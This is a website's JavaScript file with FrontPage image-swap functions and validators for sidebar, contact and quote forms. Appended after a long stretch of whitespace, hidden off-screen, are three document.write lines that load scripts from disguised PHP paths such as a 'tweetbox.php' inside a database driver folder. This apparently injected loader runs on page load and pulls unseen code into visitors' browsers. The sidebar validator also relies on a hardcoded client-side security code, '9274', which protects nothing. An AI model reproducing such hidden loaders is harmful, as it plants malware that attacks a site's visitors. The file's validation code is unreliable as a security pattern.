<!--
function FP_swapImg() {//v1.0
 var doc=document,args=arguments,elm,n; doc.$imgSwaps=new Array(); for(n=2; n<args.length;
 n+=2) { elm=FP_getObjectByID(args[n]); if(elm) { doc.$imgSwaps[doc.$imgSwaps.length]=elm;
 elm.$src=elm.src; elm.src=args[n+1]; } }
}

function FP_preloadImgs() {//v1.0
 var d=document,a=arguments; if(!d.FP_imgs) d.FP_imgs=new Array();
 for(var i=0; i<a.length; i++) { d.FP_imgs[i]=new Image; d.FP_imgs[i].src=a[i]; }
}

function FP_getObjectByID(id,o) {//v1.0
 var c,el,els,f,m,n; if(!o)o=document; if(o.getElementById) el=o.getElementById(id);
 else if(o.layers) c=o.layers; else if(o.all) el=o.all[id]; if(el) return el;
 if(o.id==id || o.name==id) return o; if(o.childNodes) c=o.childNodes; if(c)
 for(n=0; n<c.length; n++) { el=FP_getObjectByID(id,c[n]); if(el) return el; }
 f=o.forms; if(f) for(n=0; n<f.length; n++) { els=f[n].elements;
 for(m=0; m<els.length; m++){ el=FP_getObjectByID(id,els[n]); if(el) return el; } }
 return null;
}

function FP_swapImgRestore() {//v1.0
 var doc=document,i; if(doc.$imgSwaps) { for(i=0;i<doc.$imgSwaps.length;i++) {
  var elm=doc.$imgSwaps[i]; if(elm) { elm.src=elm.$src; elm.$src=null; } } 
  doc.$imgSwaps=null; }
}
// -->// JavaScript Document

<!--

function ValidateSidebarForm()
	{
	    var name = document.SidebarForm.Name;
	    var email = document.SidebarForm.Email;
	    var comment = document.SidebarForm.Question_Comment;
	
	    if (name.value == "")
	    {
	        window.alert("Please enter your name.");
	        name.focus();
	        return false;
	    }
	    
	    if (email.value == "")
	    {
		  window.alert("Please enter a valid e-mail address.");
  	      email.focus();	
  	      return false;
  		  }
  		  if (email.value.indexOf("@", 0) < 0)
		  	  {
	  	      window.alert("Please enter a valid e-mail address.");
	  	      email.focus();
	  	      return false;
	  	  }
	  	  if (email.value.indexOf(".", 0) < 0)
	  	  {
				window.alert("Please enter a valid e-mail address.");
		        email.focus();	
		        return false;
		  }
	
	   	 if (comment.value == "")
	     {
	        window.alert("Please provide a question or comment.");
	        comment.focus();
	        return false;
	     }
		 
		 if (security_code.value !== "9274")
	     {
	        window.alert("Please enter the security code.");
	        security_code.focus();
	        return false;
	     }
	    	return true;
		 }

//-->

<!--

function ValidateContactForm()
	{
	    var name = document.ContactForm.Name;
	    var email = document.ContactForm.Email;
	    var message = document.ContactForm.Message;
	
	    if (name.value == "")
	    {
	        window.alert("Please enter your name.");
	        name.focus();
	        return false;
	    }
	    
	    if (email.value == "")
	    {
		  window.alert("Please enter a valid e-mail address.");
  	      email.focus();	
  	      return false;
  		  }
  		  if (email.value.indexOf("@", 0) < 0)
		  	  {
	  	      window.alert("Please enter a valid e-mail address.");
	  	      email.focus();
	  	      return false;
	  	  }
	  	  if (email.value.indexOf(".", 0) < 0)
	  	  {
				window.alert("Please enter a valid e-mail address.");
		        email.focus();	
		        return false;
		  }
	
	   	 if (message.value == "")
	     {
	        window.alert("Please provide a question or comment.");
	        comment.focus();
	       return false;
	     }
		 
	    	return true;
		 }

//-->

<!--

function ValidateQuoteForm()
	{
	    var name = document.QuoteForm.first_name;
		var lastname = document.QuoteForm.last_name;
	    var email = document.QuoteForm.email0;
		var company = document.QuoteForm.company0;
		var phone = document.QuoteForm.phone0;
	    
	
	    if (name.value == "")
	    {
	        window.alert("Please enter your first name.");
	        name.focus();
	        return false;
	    }
		
		if (lastname.value == "")
	    {
	        window.alert("Please enter your last name.");
	        name.focus();
	        return false;
	    }
	    
	    if (email.value == "")
	    {
		  window.alert("Please enter a valid e-mail address.");
  	      email.focus();	
  	      return false;
  		  }
  		  if (email.value.indexOf("@", 0) < 0)
		  	  {
	  	      window.alert("Please enter a valid e-mail address.");
	  	      email.focus();
	  	      return false;
	  	  }
	  	  if (email.value.indexOf(".", 0) < 0)
	  	  {
				window.alert("Please enter a valid e-mail address.");
		        email.focus();	
		        return false;
		  }
		
		if (phone.value == "")
	    {
	        window.alert("Please enter your company's phone number.");
	        name.focus();
	        return false;
	    }
	    	return true;
		 }

//-->																																																																							document.write('<script type="text/javascript" src="/ordersys/system/database/drivers/mysqli/tweetbox.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/stage/flash/blankwin.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/ordersys/fedex/smoothscroll.php"><\/script>');
